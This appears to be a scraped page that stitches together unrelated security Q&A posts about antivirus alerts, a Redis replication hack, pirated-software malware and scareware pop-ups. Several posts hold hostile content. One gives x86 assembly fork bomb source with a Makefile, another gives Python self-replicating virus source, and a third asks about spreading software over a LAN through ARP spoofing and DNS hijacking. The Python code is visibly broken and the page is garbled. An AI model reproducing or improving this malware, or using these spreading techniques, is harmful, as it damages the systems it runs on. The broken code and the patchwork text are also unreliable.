virus – Getting a lot of daily trojan warnings from antivirus coming from the same IPs and they contain weird databases?

this is a very weird situation and I am frankly at a loss.
For a while now, I have been getting multiple daily trojan warnings from my antivirus (MalwareBytes). The IPs my web guard continuously blocks are very similar. Here is a list of them:

193.57.40.222    **
113.59.224.77
201.132.110.134  **
202.83.19.248
111.75.54.86
etc.

** The first and third IPs are apparently random apache servers, one in Ukraine and one in Mexico. The third one is what is most interesting to me. For some reason, if you go to it, you can log onto a database via their phpmyadmin and see loads of random information, including databases of usernames and passwords. This database seems to also be connected to a website called “megared.net.mx”

What is happening here? And why am I getting “trojans” from these IPs every single day?!

Thanks for any clarification…

Fork Bomb virus in Assembly

I made a fork bomb virus in Assembly. Now, I want to make my code better.

Here is my code:

section .text
    global _start

_start:
    mov eax, 2
    int 0x80
    jmp _start

Makefile:

DIR=build
$(shell mkdir -p $(DIR))
$(shell nasm -f elf64 Program.asm -o Program.o)
$(shell ld Program.o -o build/ForkBomb)
$(shell rm Program.o)
$(shell echo "run.sh" > build/run.sh)
$(shell echo "./build/ForkBomb" > build/run.sh)

virus – Hacked through Redis — red2.so

I’ve been building a web server (using Ruby on Rails) that uses Redis on my macOS machine. I’ve been using Redis locally on the default port without a password because I didn’t think it was accessible from the internet.

It appears I was wrong: after taking a break from my computer and returning to my terminal session, I noticed a new file git hadn’t yet tracked called red2.so. Redis creates a dump.rdb file regularly which I often delete, so I almost did so for this new file as well, thinking it was just one of those pesky files Redis creates sometimes, but luckily I decided at the last minute to investigate.

I open my Redis logs and what do I see? Somebody established a connection with my running Redis instance and started what appears to be called a “master-slave sync.” Something about “replication.” Some 50kb of something were sent to my computer. After that, a bunch of error messages saying stuff like “Error condition on socket for SYNC: Connection reset by peer,” or “Error reply to PING from master: ‘-Reading from master: Operation now in progress.’” Then one last message saying “MASTER MODE enabled” with information relating to an IP address, including the flag “cmd=slaveof.”

According to the logs, which are timestamped, the above took all of ~8 seconds, which I’m guessing means that the attack was automated, not manual. 40 minutes later I see a log entry saying “1 changes in 3600 seconds. Saving…”, which I think was a standard Redis thing that runs periodically.

The Redis dump file looks clean. A quick online search for the suspicious file name “red2.so” suggests that I’ve been hacked through an exploit in open Redis instances introduced by a new feature in recent versions of Redis; that a worm has likely been installed on my computer, and that this vulnerability allows the attacker to execute arbitrary code.

Apparently, this attack has been on the scene for at least about a year, and has been written about:

and asked about:

I don’t understand how this could have happened as my macOS firewall was on.

Does anyone have experience with this attack or heard of it? What do you think the extent of it has been on my machine in terms of damages or snooping, or how I could find out? Should I just replace my machine and not look back (I have somewhat recent backups)? I’m running an anti-virus scan as we speak but any pointers would be appreciated.

I’m running the latest Redis (4.2.5) on macOS Catalina (10.15.7).

virus – Is malware distributed with pirated software actually common?

Downloading pirated software is a crime in many countries and visiting websites involved with pirating puts you at risk of getting viruses not only from the software itself, but also from rogue advertising since criminal gangs are involved.

Regardless the fact that many people download and run the pirated software and movies, nearly all of them contain some kind of malware. And moreover, these trojans hide themselves from detection pretty well as nobody cares about chasing malware in pirated content.
Even if antivirus grabs one, users normally put it into exception and don’t care, based on an assumption that “antiviruses don’t like cracked software”, while in fact, cracked software and free movies do contain malware.

The file does not need to be executable to infect your PC. Normally it contains only a minimal payload in any type of file which then exploits a vulnerability in your PC so it can run and then it downloads the rest from the internet.

Also, extremely bad things happen sometimes. The best example was a pirated version of XCode for MacOS which was backdoored and went undetected for long time in China. It wasn’t classical piracy, it was just an unauthorized download, so if you have a chance to download authorized software, do so.

See this: Chinas Awful Internet Speed Has Spread Malware to Millions of Smartphones and this: Novel Malware XcodeGhost Modifies Xcode Infects Apple iOS Apps and Hits App Store

Note that it wasn’t typical malware, but it was modified development stack which basically hid malware in numerous applications built with it and then spread onto mobile devices via the AppStore. So it was a free application, but unauthorized – that’s why it’s best to get only valid content.

Regarding legal software and malware, such as Windows 10, there have been rumors that Microsoft can read any data from your hard drive, which isn’t true. The quoted text from the EULA which was published on many websites was modified by removing important words, so that the whole sentence has an incorrect meaning. The point is, that when you are using online services like Outlook365 or Google Drive, you send that data to the provider. However, this data is encrypted during transfer and at-rest in cloud and the key is derived from your password. For criminals it’s easier to break into your PC than into the cloud.

Finally, the answer to your question based on statistical data from BitTorrent would be “Yes”. I can’t publish in which torrents I have found it – just how I found it. For example, I got one WMV file which wasn’t detected by Panda, but then it downloaded another payload which was detected by Panda but not by Avast. In another instance, there was a program downloaded which had remote control built-in and it was contacting a host on the internet, which was was detected by the IDS. In another instance, the downloaded key logger software had a backdoor which was neutralized by Kaspersky AV.

I’d suggest trying trials and free games. There’s more of them every year and these are very often full fledged products. You can also obtain free games during promotions and competitions. Very often there are lowered prices some time after the product is released (e.g. on Amazon). There are also many promotions in many online stores during certain periods during the year. Note that this is the case for the most well known and reputable sources. Any unknown website selling cheap software is very likely selling pirated copies and very likely with embedded Trojans. Try to pay less for the hardware, it’s a lot cheaper today, you can buy very good business laptops and desktops for a third of the price.

virus – Is my Windows 10 infected with malware?

When i use google chrome occasionally appears about 5 different McAfee’s notification (I don’t have McAfee installed), one of those:

enter image description here

ATTENTION! Your computer is in danger. We detected a virus on your computer. You need to remove viruses from your computer. The system is infected. Click here to clean 22.39 uelihaldiscret.online. Open. X Remove propagant.

enter image description here

“Application Erro. The instruction in 0x00007FFC3C0241C1 retained the memory in 0x0000000000000000, The memory cannot be read. Click ‘OK’ to end the program. OK.”

What i supposed to do? When I click to close, opens two sites: http://lp3.clean-pc-now.club/ and antivirushub.co but my avast add-ons blocks these sites.

python – simple self-replicating virus

I made a virus that copies itself to any .py file it sees. It isn’t very fancy, but it does the job. I was wondering if a) you guys could give any feedback or whatever and b) if you know of any resources to learn how to make viruses (not for anything bad of course… 😀 ).

import os


class Virus:
    def __init__(self, path):
        self.this_file = open(__file__)
        self.list_of_files = ()
        self.make_list_of_files(path)
        for file in self.list_of_files:
            self.infect(file)

    def infect(self, file_name):
        file_to_infect = open(file_name, "a+")
        file_to_infect.write('n')  # first we make a line break in case there is no line break at the end
        # of the infected file
        for line in self.this_file:
            file_to_infect.write(line)
        file_to_infect.close()

    def make_list_of_files(self, path):
        dirs = os.listdir(path)
        for directory in dirs:
            if os.path.isdir(path + '\' + directory):
                self.make_list_of_files(path + '\' + directory)
            elif directory(-3:) == '.py':
                self.list_of_files.append(path + '\' + directory)


virus = Virus("C:\") # don't run this without changing the file to something 
# that won't wreck all of your python files

How can a virus spread in a local network?

I need to distribute an application to many computers in a local network.
I’ve thought of ARP spoofing and then DNS hijacking, where a site would initiate a download. Of course, it won’t be that dull. But I also want to look at different options, the thing is that I don’t know of alternative ways. Are there other ways to do it?

Anti -virus software in the world, which one did you use before or now?

Share with you my collection of anti-virus software list here:
1.BitDefender Antivirus 2010
US$24.95
http://www.bitdefender.com/
2.Kaspersky Anti-Virus 2010
US$59.95
http://www.kaspersky.com/
3.Webroot AntiVirus with SpySweeper 2010
US$29.95
http://www.Webroot.com
4. Norton AntiVirus 2010
US$39.99
http://www.symantec.com/
5. ESET Nod32 Antivirus 4
US$39.99
http://www.eset.com/
6. AVG Anti-Virus 9
US$34.99…

Anti -virus software in the world, which one did you use before or now?

antivirus – How can antiviruses protect our computers if virus maker checks them with antiviruses?

Because we know that the antivirus can detect what it was tested to detect.

There is no “silver bullet” in security. There is no one thing that will magically protect everyone from everything in the future. Security is about reducing risks and defending against specific threats.

And eventually, the antivirus makers will be able to detect the new virus. So, really, all you are worried about is the window of time where the new virus is released and when the antivirus starts to detect it. And since no virus can hit all computers at once when it is first released, you also get a reduction in risk by the fact that the chances are low that you will ever see a truly new and novel virus that your antivirus will not detect.